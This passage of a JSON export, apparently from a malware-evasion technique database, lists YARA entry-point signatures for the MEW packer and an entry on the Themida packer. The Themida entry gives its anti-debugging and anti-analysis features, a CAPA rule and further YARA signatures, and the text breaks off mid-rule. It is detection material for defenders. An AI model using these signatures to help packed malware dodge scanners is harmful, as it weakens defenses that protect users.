                    "rule": "rule Mew_11_SE_v12_Eng_Northfox_: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_V10_Eng_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v10_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_12: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_02_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MEW_11_SE_11_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 00 00 00 02 00 00 00 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_501_NorthFox_HCC: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D }\r\n        $b = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 
00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PseudoSigner_02_MEW_11_SE_10: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_v10_Eng_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12_NorthfoxHCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_11_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_11_SE_v12_Eng_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_packer_v10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_by_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 
00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_11_SE_v12_Eng_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 06 1E 52 B8 ?? ?? 1E CD 21 86 E0 3D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12_NorthfoxHCC: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_MEW_11_SE_10: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_MEW_11_SE_10: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_5_10_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 48 01 ?? ?? ?? ?? ?? 95 A5 33 C0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 9D 11 40 00 8D 95 B4 11 40 00 E8 CB 2E 00 00 33 C0 F7 F0 69 8D B5 05 12 40 00 B9 5D 2E 00 00 8B FE AC }\r\n        $b = { EB 02 FA 04 E8 49 00 00 00 69 E8 49 00 00 00 95 E8 4F 00 00 00 68 E8 1F 00 00 00 49 E8 E9 FF FF FF 67 E8 1F 00 00 00 93 E8 31 00 00 00 78 E8 DD FF FF FF 38 E8 E3 FF FF FF 66 E8 0D 00 00 00 04 E8 E3 FF FF FF 70 E8 CB FF FF FF 69 E8 DD FF FF FF 58 E8 DD FF FF FF 69 E8 E3 FF FF FF 79 E8 BF FF FF FF 69 83 C4 40 E8 00 00 00 00 5D 81 ED 9D 11 40 00 8D 95 B4 11 40 00 E8 CB 2E 00 00 33 C0 F7 F0 69 8D B5 05 12 40 00 B9 5D 2E 00 00 8B FE AC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MEW_5_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? AD 91 AD 93 53 AD 96 56 5F AC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 00 00 00 02 00 00 00 0C ?0 }\r\n        $b = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Mew_501_NorthFox_HCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_by_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_exe_coder_10_Northfox_HCC: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_v10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_Northfox_HCC: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C }\r\n        $b = { E9 ?? ?? ?? FF 0C ?0 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MEW_11_SE_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_exe_coder_10_Northfox_HCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF 6A ?? ?? ?? ?? ?? 70 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 00 00 00 02 00 00 00 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_5_10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_v10_Eng_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11_Northfox_HCC_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 187,
            "unprotect_id": "U1406",
            "name": "Themida",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Themida is a well-known commercial packer that combines several protections, including anti-debugging, virtual machine emulation and encryption. Its feature list includes:\r\n\r\n- Anti-debugger techniques that detect/fool any kind of debugger\r\n\r\n- Anti-memory-dumper techniques against any Ring3 and Ring0 dumpers\r\n\r\n- Different encryption algorithms and keys in each protected application\r\n\r\n- Anti-API-scanner techniques that prevent reconstruction of the original import table\r\n\r\n- Automatic decompilation and scrambling techniques in the target application\r\n\r\n- Virtual Machine emulation in specific blocks of code\r\n\r\n- Advanced Mutator engine\r\n\r\n- Anti-disassembly techniques for any static and interactive disassembler\r\n\r\n- Multiple polymorphic layers with more than 50.000 permutations\r\n\r\n- Anti-monitor techniques against file and registry monitors\r\n\r\n- Random garbage code insertion between real instructions\r\n\r\n- Advanced Threads network communication\r\n\r\n- Anti-memory-patching and CRC techniques in the target application\r\n\r\n- Metamorphic engine to scramble original instructions\r\n\r\n- Advanced Entry point protection\r\n\r\n- Dynamic encryption in the target application\r\n\r\n- Anti-tracing code insertion between real instructions\r\n\r\n- Advanced Anti-breakpoint manager\r\n\r\n- Real-time protection in the target application\r\n\r\n- Compression of the target application, resources and protection code\r\n\r\n- Anti-“debugger hiders” techniques\r\n\r\n- Full mutation in protection code to avoid pattern recognition\r\n\r\n- Real-time simulation in the target application\r\n\r\n- Intelligent protection code insertion inside the target application\r\n\r\n- Random internal data relocation",
            "resources": "https://www.oreans.com/Themida.php",
            "tags": "themida",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 98,
                    "key": "capa_detect_themida",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_Themida",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with Themida\r\n    namespace: anti-analysis/packer/themida\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing::Themida [F0001.011]\r\n    references:\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - 8a132663bee5c2f0f5cbfebee1b55ac72934632bf32bc32d6e2dae797c9e6e35\r\n      - 2826b762b9c268601a44974ef469a671b441e798a6c3cbb40070450c6c030ba2\r\n  features:\r\n    - or:\r\n      - section: Themida\r\n      - section: .Themida\r\n      - section: .themida\r\n      - section: WinLicen\r\n      - section: .winlice\r\n      - count(section(        )): 2 or more\r\n        description: Section names containing 8 space characters observed in Themida 3.0.x packed files\r\n      - and:\r\n        - description: Section names containing 3 and 8 space characters observed in Themida 2.1.x packed files\r\n        - section: \"   \"\r\n        - section: \"        \""
                },
                {
                    "id": 105,
                    "key": "yara_detect_themida",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Themida",
                    "rule": "rule ThemidaWinLicense_V1X_Oreans_Technologies_SignByfly: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 43 4F 4D 43 54 4C 33 32 2E 64 6C 6C 00 00 00 49 6E 69 74 43 6F 6D 6D 6F 6E 43 6F 6E 74 72 6F 6C 73 00 00 00 00 00 00 }\r\n        $b = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 43 72 65 61 74 65 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n        $b = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Themida_1201_compressed_Oreans_Technologies_h: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 ?? ?? 
60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_18xx_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V10X_V17X_DLL_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? ?? ?? ?? 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V18X_V19X_DLL_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 
8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ThemidaWinLicense_V1820_p_Oreans_Technologies: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 68 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule themida_1005_httpwwworeanscom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_10xx_18xx_no_compression_Oreans_Technologies_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 }\r\n        $b = { 55 8B EC 83 C4 D8 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8B DA C7 45 D8 00 00 00 00 8B 45 D8 40 89 45 D8 81 7D D8 80 00 00 00 74 0F 8B 45 08 89 83 ?? ?? ?? ?? 
FF 45 08 43 EB E1 89 45 DC 61 8B 45 DC C9 C2 04 00 55 8B EC 81 C4 7C FF FF FF 60 E8 00 00 00 00 5A 81 EA ?? ?? ?? ?? 8D 45 80 8B 5D 08 C7 85 7C FF FF FF 00 00 00 00 8B 8D 7C FF FF FF D1 C3 88 18 41 89 8D 7C FF FF FF 81 BD 7C FF FF FF 80 00 00 00 75 E3 C7 85 7C FF FF FF 00 00 00 00 8D BA ?? ?? ?? ?? 8D 75 80 8A 0E BB F4 01 00 00 B8 AB 37 54 78 D3 D0 8A 0F D3 D0 4B 75 F7 0F AF C3 47 46 8B 8D 7C FF FF FF 41 89 8D 7C FF FF FF 81 F9 80 00 00 00 75 D1 61 C9 C2 04 00 55 8B EC 83 C4 F0 8B 75 08 C7 45 FC 00 00 00 00 EB 04 FF 45 FC 46 80 3E 00 75 F7 BA 00 00 00 00 8B 75 08 8B 7D 0C EB 7F C7 45 F8 00 00 00 00 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ThemidaWinLicense_V2010_p_Hide_from_PE_scanners_Type2: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Themida_1201_compressed_Oreans_Technologies_h_additional: 